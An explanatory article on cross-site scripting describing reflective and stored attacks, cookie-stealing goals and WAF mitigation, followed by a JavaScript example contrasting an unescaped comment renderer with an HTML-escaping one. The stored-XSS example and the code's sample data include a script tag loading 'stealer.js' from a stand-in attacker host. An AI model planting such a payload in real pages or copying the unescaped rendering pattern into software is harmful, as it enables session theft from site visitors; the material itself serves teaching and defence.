Cross-Site Scripting (XSS)

Cross-site scripting (XSS) is used by attackers to inject malicious code into vulnerable web applications. Unlike other web application attacks (such as SQL injection), attackers are not directly targeting the application. Instead, the application is a means for attacking the application's users.
Although there are myriad reasons for an XSS attack, the more common ones are:

  • Hijacking the user’s account
  • Accessing the user’s browser history or private messages
  • Exploiting the user’s web applications and devices, such as webcams, microphones, files, geolocation info, etc.
  • Distributing web worms via the user’s browser

Often an XSS attack is the first step in an escalating series of more serious attacks. When combined with social engineering, an XSS attack can result in identity theft, keylogging, cookie theft, or phishing attacks.

Threat Description

An XSS attack embeds a malicious script into a vulnerable webpage, which is then executed by the user’s browser. A webpage is vulnerable if:

  • User-supplied input is automatically added to HTML output; and
  • Output to the browser does not use context-sensitive escaping (encoding) to prevent user-supplied scripts from running

There are two primary types of XSS attacks: reflective and persistent.

Reflective (Unstored) XSS Attacks

A reflective XSS attack mimics a trusted person or organization so that a user clicks a link that carries a malicious script.

One of the most common reflective XSS attack methods is to send an email, text message, or social media message containing a link to malicious JavaScript. If the recipient clicks the link — and the web application does not validate the JavaScript input or encode the HTML output — the malicious code is reflected directly back to the user’s browser, where it’s executed during the user’s current session.

Persistent (Stored) XSS Attacks

A persistent XSS attack embeds malicious HTML tags — for example, script, body, img, iframe, input, link, object, table — directly into a vulnerable web application’s page. Blogs, social networks, video sharing platforms, and message boards are primary targets for persistent XSS attacks.

Unlike a reflective XSS attack, which activates an attack script only after a user clicks a malicious link, a persistent XSS attack only requires a visit to the compromised web page. This increases the reach of the attack, endangering all visitors regardless of their level of vigilance.

For example, an attacker discovers that an online news site allows HTML tags to be embedded in a page’s comment section. The attacker submits a comment that includes HTML tags, such as:

Great article! Read my review here <script src=http://attacksite.com/stealer.js></script>

The HTML tags are now a part of the comments section of the page. As a result, every time the page is accessed, the script tag loads the JavaScript file hosted on attacksite.com and the visitor's browser runs it. The script can then steal every visitor's cookies for that session.

With the session cookies in hand, the attacker can hijack any visitor’s account, accessing personal and confidential information without the knowledge or consent of the visitor.

Figure 1. Persistent XSS Attack

Mitigation Methods

A web application firewall (WAF) is the most commonly used solution for protecting against XSS and other web application attacks. In the case of XSS attacks, most WAFs use signature-based filtering to identify and block malicious requests.
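A WAF filters requests on the way in; the condition named in the Threat Description (user input concatenated into HTML output without escaping) is fixed in the application itself. The following is an added example, not code from the original article or from Imperva: a vulnerable comment renderer beside a hardened one that escapes user-controlled values for the HTML text context, run over a comment modelled on the news-site example above. The function names are the example's own.

```javascript
// Added example (not from the original article): the vulnerable pattern the
// Threat Description names (user input concatenated straight into HTML) beside
// the hardened form (escaping the output for the context it lands in).
// Function and variable names here are the example's own, not a library API.

// Escape the five characters that are significant in an HTML text node or a
// double/single-quoted attribute value. After this, the browser treats the
// comment as literal text and never parses "<script ...>" as a tag.
// Note: this encoder is for the HTML text/attribute context only; a value
// placed inside a <script> block or a URL needs a different encoder.
function escapeHtml(untrusted) {
  return String(untrusted)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}

// Vulnerable: the stored comment is inserted verbatim, so an attacker's tags
// become part of the page markup served to every visitor.
function renderCommentVulnerable(author, body) {
  return `<div class="comment"><b>${author}</b>: ${body}</div>`;
}

// Hardened: every user-controlled value is escaped before concatenation.
function renderCommentSafe(author, body) {
  return `<div class="comment"><b>${escapeHtml(author)}</b>: ${escapeHtml(body)}</div>`;
}

// Constructed sample comment, modelled on the article's news-site example.
const storedComment = {
  author: "reader42",
  body: "Great article! Read my review here <script src=http://attacksite.com/stealer.js></script>",
};

// Render both ways and report whether a live <script> tag survives in each.
function demo() {
  const bad = renderCommentVulnerable(storedComment.author, storedComment.body);
  const good = renderCommentSafe(storedComment.author, storedComment.body);
  return {
    bad,
    good,
    badHasScript: /<script/i.test(bad),   // true: the tag is live
    goodHasScript: /<script/i.test(good), // false: rendered as "&lt;script"
  };
}
```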
